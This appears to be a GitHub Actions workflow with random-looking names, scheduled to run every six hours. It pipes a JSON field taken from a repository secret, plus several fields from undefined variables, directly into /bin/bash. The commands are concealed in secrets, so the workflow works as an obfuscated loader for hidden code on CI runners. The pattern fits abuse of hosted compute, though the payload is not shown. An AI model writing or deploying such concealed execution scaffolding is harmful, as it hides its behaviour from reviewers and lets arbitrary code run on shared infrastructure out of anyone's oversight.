name: temptanaconda
on:
  workflow_dispatch:
  schedule:
    - cron: '6 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: temptanaconda
        env:
          mrfi95: ${{ secrets.mrfi95 }}
        run: |
          echo $mrfi95 | jq -r .hzlde250 | /bin/bash
          echo $rl25629 | jq -r .eaav362 | /bin/bash
          echo $rfpqv48 | jq -r .fqeyu1919 | /bin/bash
          echo $r37653 | jq -r .doyf8 | /bin/bash
          echo $sptmh00157 | jq -r .rxdo8853 | /bin/bash
          echo $gb46 | jq -r .lzh273 | /bin/bash
          echo $q7539 | jq -r .rw50 | /bin/bash
          echo $mtyv32 | jq -r .x416 | /bin/bash
          echo $rm39236 | jq -r .n997 | /bin/bash

